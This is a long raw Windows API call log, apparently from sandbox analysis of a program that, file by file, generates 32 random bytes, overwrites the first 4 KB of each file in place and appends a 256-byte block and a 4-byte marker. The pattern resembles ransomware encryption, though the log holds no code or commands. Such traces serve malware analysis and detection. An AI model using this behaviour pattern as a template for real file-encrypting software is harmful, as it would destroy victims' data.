SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.301] ReadFile (in: hFile=0x7cc, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.301] SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.301] GetProcessHeap () returned 0x4f10000 [0077.301] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.301] GetProcessHeap () returned 0x4f10000 [0077.301] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.301] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.301] GetProcessHeap () returned 0x4f10000 [0077.301] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.301] ReadFile (in: hFile=0x7cc, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.352] SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.352] WriteFile (in: hFile=0x7cc, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.352] GetProcessHeap () returned 0x4f10000 [0077.352] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.353] GetProcessHeap () returned 0x4f10000 [0077.353] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.354] GetProcessHeap () returned 0x4f10000 [0077.354] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.355] GetProcessHeap () returned 0x4f10000 [0077.355] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.356] GetProcessHeap () returned 0x4f10000 [0077.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.356] SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.356] WriteFile (in: hFile=0x7cc, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.357] WriteFile (in: hFile=0x7cc, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.357] GetProcessHeap () returned 0x4f10000 [0077.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.357] GetProcessHeap () returned 0x4f10000 [0077.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.357] GetProcessHeap () returned 0x4f10000 [0077.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.357] CloseHandle (hObject=0x7cc) returned 1 [0077.358] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 21 [0077.358] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.358] ReadFile (in: hFile=0x7d0, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.358] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.358] GetProcessHeap () returned 0x4f10000 [0077.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.358] GetProcessHeap () returned 0x4f10000 [0077.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.358] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.358] GetProcessHeap () returned 0x4f10000 [0077.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.358] ReadFile (in: hFile=0x7d0, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.485] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.485] WriteFile (in: hFile=0x7d0, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.485] GetProcessHeap () returned 0x4f10000 [0077.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.485] GetProcessHeap () returned 0x4f10000 [0077.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.485] GetProcessHeap () returned 0x4f10000 [0077.485] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0077.485] GetProcessHeap () returned 0x4f10000 [0077.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.485] GetProcessHeap () returned 0x4f10000 [0077.485] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.486] GetProcessHeap () returned 0x4f10000 [0077.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.487] GetProcessHeap () returned 0x4f10000 [0077.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.488] GetProcessHeap () returned 0x4f10000 [0077.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 